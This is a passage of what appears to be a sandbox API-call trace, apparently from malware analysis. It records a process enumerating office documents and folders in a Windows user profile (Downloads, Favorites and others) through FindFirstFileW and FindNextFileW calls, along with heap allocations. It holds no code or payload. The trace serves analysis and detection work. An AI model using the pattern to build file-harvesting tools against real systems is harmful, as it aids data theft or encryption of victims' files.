nFileSizeHigh=0x0, nFileSizeLow=0x6c5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b HXAcX9_11Ge0W8.pptx", cAlternateFileName="BHXACX~1.PPT")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc19be2c0, ftCreationTime.dwHighDateTime=0x1d5a5ff, ftLastAccessTime.dwLowDateTime=0xf37642b0, ftLastAccessTime.dwHighDateTime=0x1d54c0c, ftLastWriteTime.dwLowDateTime=0xf37642b0, ftLastWriteTime.dwHighDateTime=0x1d54c0c, nFileSizeHigh=0x0, nFileSizeLow=0xc96e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bfG0Lb5W.docx", cAlternateFileName="BFG0LB~1.DOC")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b5d190, ftCreationTime.dwHighDateTime=0x1d5c27a, ftLastAccessTime.dwLowDateTime=0x5eba4ff0, ftLastAccessTime.dwHighDateTime=0x1d5be2a, ftLastWriteTime.dwLowDateTime=0x5eba4ff0, ftLastWriteTime.dwHighDateTime=0x1d5be2a, nFileSizeHigh=0x0, nFileSizeLow=0x1705c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cMmcblZ.pps", cAlternateFileName="")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ba9500, ftCreationTime.dwHighDateTime=0x1d569e3, ftLastAccessTime.dwLowDateTime=0x84393750, ftLastAccessTime.dwHighDateTime=0x1d592f6, ftLastWriteTime.dwLowDateTime=0x84393750, ftLastWriteTime.dwHighDateTime=0x1d592f6, nFileSizeHigh=0x0, nFileSizeLow=0x684c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cT9m.pptx", cAlternateFileName="CT9M~1.PPT")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb576b3d0, ftCreationTime.dwHighDateTime=0x1d558e8, ftLastAccessTime.dwLowDateTime=0xe5da2aa0, ftLastAccessTime.dwHighDateTime=0x1d5566a, ftLastWriteTime.dwLowDateTime=0xe5da2aa0, ftLastWriteTime.dwHighDateTime=0x1d5566a, nFileSizeHigh=0x0, nFileSizeLow=0x855f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUQVfBdmb1_EwjYXxrH.docx", cAlternateFileName="FUQVFB~1.DOC")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cdbb5a0, ftCreationTime.dwHighDateTime=0x1d5c588, ftLastAccessTime.dwLowDateTime=0x596039e0, ftLastAccessTime.dwHighDateTime=0x1d5c3f5, ftLastWriteTime.dwLowDateTime=0x596039e0, ftLastWriteTime.dwHighDateTime=0x1d5c3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gydf_ honDHk", cAlternateFileName="GYDF_H~1")) returned 1 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d430 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dec0 [0091.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4a78 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d99e220, ftCreationTime.dwHighDateTime=0x1d57111, ftLastAccessTime.dwLowDateTime=0x3b7764d0, ftLastAccessTime.dwHighDateTime=0x1d55ad2, ftLastWriteTime.dwLowDateTime=0x3b7764d0, ftLastWriteTime.dwHighDateTime=0x1d55ad2, nFileSizeHigh=0x0, nFileSizeLow=0x18ef5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HHDQ5hSW5Mh.xlsx", cAlternateFileName="HHDQ5H~1.XLS")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fc6350, ftCreationTime.dwHighDateTime=0x1d5583a, ftLastAccessTime.dwLowDateTime=0xb0fdec50, ftLastAccessTime.dwHighDateTime=0x1d59967, ftLastWriteTime.dwLowDateTime=0xb0fdec50, ftLastWriteTime.dwHighDateTime=0x1d59967, nFileSizeHigh=0x0, nFileSizeLow=0xd9d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J t2.docx", cAlternateFileName="JT2~1.DOC")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aac010, ftCreationTime.dwHighDateTime=0x1d5ac8a, ftLastAccessTime.dwLowDateTime=0xac374820, ftLastAccessTime.dwHighDateTime=0x1d58c64, ftLastWriteTime.dwLowDateTime=0xac374820, ftLastWriteTime.dwHighDateTime=0x1d58c64, nFileSizeHigh=0x0, nFileSizeLow=0x186b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jUfFVqR50da.pptx", cAlternateFileName="JUFFVQ~1.PPT")) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3e160, ftCreationTime.dwHighDateTime=0x1d53bfd, ftLastAccessTime.dwLowDateTime=0x5e8e8b00, ftLastAccessTime.dwHighDateTime=0x1d57e6e, ftLastWriteTime.dwLowDateTime=0x5e8e8b00, ftLastWriteTime.dwHighDateTime=0x1d57e6e, nFileSizeHigh=0x0, nFileSizeLow=0xa504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jxQbVDUd9ordHUbiLNq.xlsx", cAlternateFileName="JXQBVD~1.XLS")) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e5d110, ftCreationTime.dwHighDateTime=0x1d5bcfd, ftLastAccessTime.dwLowDateTime=0x1cb81880, ftLastAccessTime.dwHighDateTime=0x1d5b8c6, ftLastWriteTime.dwLowDateTime=0x1cb81880, ftLastWriteTime.dwHighDateTime=0x1d5b8c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lt6ZzNEQACj", cAlternateFileName="LT6ZZN~1")) returned 1 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4a00 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c92d30, ftCreationTime.dwHighDateTime=0x1d55311, ftLastAccessTime.dwLowDateTime=0x1f20e8f0, ftLastAccessTime.dwHighDateTime=0x1d56023, ftLastWriteTime.dwLowDateTime=0x1f20e8f0, ftLastWriteTime.dwHighDateTime=0x1d56023, nFileSizeHigh=0x0, nFileSizeLow=0xabf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M2mQj1jys6.docx", cAlternateFileName="M2MQJ1~1.DOC")) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db18 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4af0 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4b68 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4be0 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4988 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4a78 [0091.013] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x3112760 [0091.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dec0 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d430 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4c58 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4cd0 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4d48 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4e38 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4eb0 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2eabb70, ftCreationTime.dwHighDateTime=0x1d548ed, ftLastAccessTime.dwLowDateTime=0xfe8180e0, ftLastAccessTime.dwHighDateTime=0x1d5575e, ftLastWriteTime.dwLowDateTime=0xfe8180e0, ftLastWriteTime.dwHighDateTime=0x1d5575e, nFileSizeHigh=0x0, nFileSizeLow=0xb1ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nm0KmSzid6iXp.xlsx", cAlternateFileName="NM0KMS~1.XLS")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4988 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f6e0c0, ftCreationTime.dwHighDateTime=0x1d54448, ftLastAccessTime.dwLowDateTime=0x155d1770, ftLastAccessTime.dwHighDateTime=0x1d59c65, ftLastWriteTime.dwLowDateTime=0x155d1770, ftLastWriteTime.dwHighDateTime=0x1d59c65, nFileSizeHigh=0x0, nFileSizeLow=0xda57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PbB1.xlsx", cAlternateFileName="PBB1~1.XLS")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75804600, ftCreationTime.dwHighDateTime=0x1d5b9ce, ftLastAccessTime.dwLowDateTime=0x35d47600, ftLastAccessTime.dwHighDateTime=0x1d5bd4f, ftLastWriteTime.dwLowDateTime=0x35d47600, ftLastWriteTime.dwHighDateTime=0x1d5bd4f, nFileSizeHigh=0x0, nFileSizeLow=0x176a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QDvr5quvK.csv", cAlternateFileName="QDVR5Q~1.CSV")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf64cb840, ftCreationTime.dwHighDateTime=0x1d53b16, ftLastAccessTime.dwLowDateTime=0xd3aa5e30, ftLastAccessTime.dwHighDateTime=0x1d5414e, ftLastWriteTime.dwLowDateTime=0xd3aa5e30, ftLastWriteTime.dwHighDateTime=0x1d5414e, nFileSizeHigh=0x0, nFileSizeLow=0x2c26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSZwHHbt_h.pptx", cAlternateFileName="RSZWHH~1.PPT")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f5efd0, ftCreationTime.dwHighDateTime=0x1d53c0c, ftLastAccessTime.dwLowDateTime=0x143b0f90, ftLastAccessTime.dwHighDateTime=0x1d5ba07, ftLastWriteTime.dwLowDateTime=0x143b0f90, ftLastWriteTime.dwHighDateTime=0x1d5ba07, nFileSizeHigh=0x0, nFileSizeLow=0x17e3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdeX 3--r7K2XLPqxP4.pptx", cAlternateFileName="TDEX3-~1.PPT")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e89860, ftCreationTime.dwHighDateTime=0x1d57973, ftLastAccessTime.dwLowDateTime=0x8dafb3e0, ftLastAccessTime.dwHighDateTime=0x1d53c20, ftLastWriteTime.dwLowDateTime=0x8dafb3e0, ftLastWriteTime.dwHighDateTime=0x1d53c20, nFileSizeHigh=0x0, nFileSizeLow=0x8849, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yMP4dzVGPCH01lD1.xlsx", cAlternateFileName="YMP4DZ~1.XLS")) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e89860, ftCreationTime.dwHighDateTime=0x1d57973, ftLastAccessTime.dwLowDateTime=0x8dafb3e0, ftLastAccessTime.dwHighDateTime=0x1d53c20, ftLastWriteTime.dwLowDateTime=0x8dafb3e0, ftLastWriteTime.dwHighDateTime=0x1d53c20, nFileSizeHigh=0x0, nFileSizeLow=0x8849, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yMP4dzVGPCH01lD1.xlsx", cAlternateFileName="YMP4DZ~1.XLS")) returned 0 [0091.014] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.015] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.015] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.015] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.015] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.015] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.015] PathFindFileNameW (pszPath="") returned="" [0091.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.016] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.016] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.016] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0091.016] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.016] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.016] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.016] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.016] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.016] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.016] PathFindFileNameW (pszPath="") returned="" [0091.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db18 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", 